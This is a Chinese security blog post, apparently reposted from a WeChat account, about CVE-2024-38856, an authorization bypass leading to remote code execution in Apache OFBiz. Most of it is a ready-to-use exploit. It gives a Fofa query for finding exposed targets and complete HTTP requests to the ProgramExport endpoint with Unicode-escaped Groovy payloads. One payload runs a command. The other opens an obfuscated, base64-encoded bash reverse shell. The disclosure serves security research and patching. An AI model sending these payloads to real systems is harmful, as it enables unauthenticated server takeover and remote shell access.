漏洞简介
ApacheOFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。
2024年8月,互联网上披露了ApacheOFBiz授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
》》》影响范围《《《
Apache OFBiz <= 18.12.140
漏洞复现
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# Fofa搜索语法
app="Apache_OFBiz"
步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容...
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b
反弹shell脚本
POST /webtools/control/main/ProgramExport HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
groovyProgram=u0022u0062u0061u0073u0068u0020u002Du0063u0020u007Bu0065u0063u0068u006Fu002Cu004Cu0032u004Au0070u0062u0069u0039u0069u0059u0058u004Eu006Fu0049u0043u0031u0070u0049u0044u0034u006Du0049u0043u0039u006Bu005Au0058u0059u0076u0064u0047u004Eu0077u004Cu007Au0045u0079u004Eu0079u0034u0077u004Cu006Au0041u0075u004Du0053u0038u0034u004Fu0044u0067u0034u0049u0044u0041u002Bu004Au006Au0045u003Du007Du007Cu007Bu0062u0061u0073u0065u0036u0034u002Cu002Du0064u007Du007Cu007Bu0062u0061u0073u0068u002Cu002Du0069u007Du0022u002Eu0065u0078u0065u0063u0075u0074u0065u0028u0029
原文始发于微信公众号(揽月安全团队):Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论